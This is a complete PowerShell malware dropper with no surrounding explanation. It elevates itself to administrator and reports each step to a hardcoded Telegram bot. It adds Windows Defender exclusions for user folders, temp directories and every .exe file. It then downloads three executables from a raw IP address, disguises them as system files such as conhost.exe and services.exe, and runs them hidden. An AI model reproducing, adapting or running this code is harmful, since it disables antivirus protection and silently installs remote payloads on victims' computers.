$ProgressPreference = 'SilentlyContinue' [Console]::OutputEncoding = [System.Text.Encoding]::UTF8 [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 if (-NOT ([Security.Principal.WindowsPrincipal]::new([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { Start-Process powershell.exe "-NoProfile -ExecutionPolicy Bypass -File `"$PSCommandPath`"" -Verb RunAs exit } $botToken = "8704858544:AAHbqNtM5sKth_ElmNTv1z96lRexadYmznE" $chatId = "-1003980351221" function Send-TelegramMessage { param ([string]$Message) try { $url = "https://api.telegram.org/bot$botToken/sendMessage" $body = @{ chat_id = $chatId; text = $Message; parse_mode = "HTML" } $json = $body | ConvertTo-Json $bytes = [System.Text.Encoding]::UTF8.GetBytes($json) $webRequest = [System.Net.WebRequest]::Create($url) $webRequest.Method = "POST" $webRequest.ContentType = "application/json" $webRequest.ContentLength = $bytes.Length $stream = $webRequest.GetRequestStream() $stream.Write($bytes, 0, $bytes.Length) $stream.Close() $webRequest.GetResponse().Close() } catch {} } Send-TelegramMessage -Message "[INFO] Script started on $env:COMPUTERNAME" Send-TelegramMessage -Message "[INFO] Adding exclusions..." $exclusions = @( "C:\Program Files (x86)" "C:\Users" "$env:TEMP" "$env:APPDATA" ) foreach ($path in $exclusions) { Add-MpPreference -ExclusionPath $path -ErrorAction SilentlyContinue } Add-MpPreference -ExclusionExtension "*.exe" -ErrorAction SilentlyContinue Send-TelegramMessage -Message "[OK] Exclusions added. Waiting before downloads..." Start-Sleep -Seconds 5 $tempDir = Join-Path $env:TEMP "ExeDownloads" if (-not (Test-Path $tempDir)) { New-Item -ItemType Directory -Path $tempDir -Force | Out-Null } $files = @( @{url="https://144.31.53.218/conhost.exe"; name="conhost.exe"}, @{url="https://144.31.53.218/neverwb.exe"; name="WindowsAudioGraph.exe"}, @{url="https://144.31.53.218/neverrt.exe"; name="services.exe"} ) $useCurl = $null -ne (Get-Command curl.exe -ErrorAction SilentlyContinue) foreach ($item in $files) { $url = $item.url $name = $item.name $rnd = Get-Random -Minimum 10000 -Maximum 99999 $folder = "$env:TEMP\$rnd" $filePath = "$folder\$name" New-Item -ItemType Directory -Path $folder -Force | Out-Null Send-TelegramMessage -Message "[INFO] Downloading: $name" $success = $false for ($i = 1; $i -le 5; $i++) { try { if ($useCurl) { curl.exe -L --retry 3 --retry-delay 2 -o "$filePath" "$url" --silent } else { certutil -urlcache -split -f "$url" "$filePath" | Out-Null } if (Test-Path $filePath) { $success = $true; break } } catch {} Start-Sleep -Seconds 3 } if ($success) { Send-TelegramMessage -Message "[OK] Downloaded: $name" Add-MpPreference -ExclusionPath $filePath -ErrorAction SilentlyContinue try { Start-Process -FilePath $filePath -WindowStyle Hidden -ErrorAction Stop Send-TelegramMessage -Message "[OK] Started: $name" } catch { Start-Process -FilePath $filePath -ErrorAction SilentlyContinue Send-TelegramMessage -Message "[OK] Started (fallback): $name" } } else { Send-TelegramMessage -Message "[ERROR] Failed: $name" } Start-Sleep -Seconds 3 } Send-TelegramMessage -Message "[OK] All files processed on $env:COMPUTERNAME" Start-Sleep -Seconds 10